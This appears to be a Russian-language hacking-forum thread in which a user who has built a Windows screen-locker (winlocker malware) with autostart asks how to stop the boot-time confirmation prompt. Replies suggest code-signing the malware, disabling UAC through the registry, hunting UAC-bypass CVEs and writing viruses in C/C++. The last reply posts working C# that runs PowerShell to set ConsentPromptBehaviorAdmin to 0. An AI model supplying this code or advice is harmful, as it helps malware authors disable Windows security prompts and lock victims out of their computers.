Загрузка...

Автозагрузка файла, без запроса прав администратора?

Тема в разделе C# создана пользователем JanitorHvhboom 1 авг 2023. 277 просмотров

Загрузка...
  1. JanitorHvhboom
    JanitorHvhboom Автор темы 1 авг 2023 хочу работать. 32 4 апр 2018
    В общем ситуация такая. Сделал дефолтный винлокер, все работает, всё гуд. В автозагрузку добавляется, но при перезагрузке ПК, прежде чем он запустится, вылазит окно подтверждения запуска файла из неизвестного источника, если нажать нет, то локер не запуститься :))))
    Ситуация кринж в итоге получается. Кто знает как обойти это дерьмо?

2. bylex
    bylex 2 авг 2023 Безделье - это игрушка дьявола 3072 7 апр 2019
    Я думаю, что это происходит по очевидной причине. Windows пытается запустить приложение из неизвестного источника и UAC (User Account Control) блокирует запуск приложения, предупреждая, что это какой-то ноунейм. Делает он это, потому что ваше приложение не имеет цифрового сертификата(или цифровой подписи). Таким образом у вас два варианта(оба гуглятся):
    1) Подписать своё приложение, чтобы оно стало доверенным.
    2) Выключать UAC при первом запуске приложения. Это можно сделать путём редактирования реестра.

Ну и не советую писать винлокер на C#, потому что может получиться, чтобы у пользователя не будет .NET фреймфорка нужной версии и он не сможет запустить ваше приложение. Получится не менее кринжовая ситуация. Для вирусов больше подойдёт C/C++. Надеюсь мой ответ помог.

1. JanitorHvhboom Автор темы
      bylex, спасибо, учту этот момент.
  3. kasperrrrr4
    kasperrrrr4 3 авг 2023 0 28 авг 2018
    поищи CVE для байпасса юака, разницы по большому счёту нет на каком ЯП ты реализуешь (дотнет фреймворк энивей будет на таргет машинке)

kasperrrrr4, тоже попробую это, когда попаду домой
  4. lonely_femboy
    lonely_femboy 27 авг 2023 сыграй мне реквием 227 21 фев 2020
    CSHARP
    using System.Management.Automation;

var script = PowerShell.Create();
    script.AddScript("Set-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" -Name \"ConsentPromptBehaviorAdmin\" -Value \"0\" ");
    script.Invoke();

lonely_femboy, а что выполняет этот скрипт?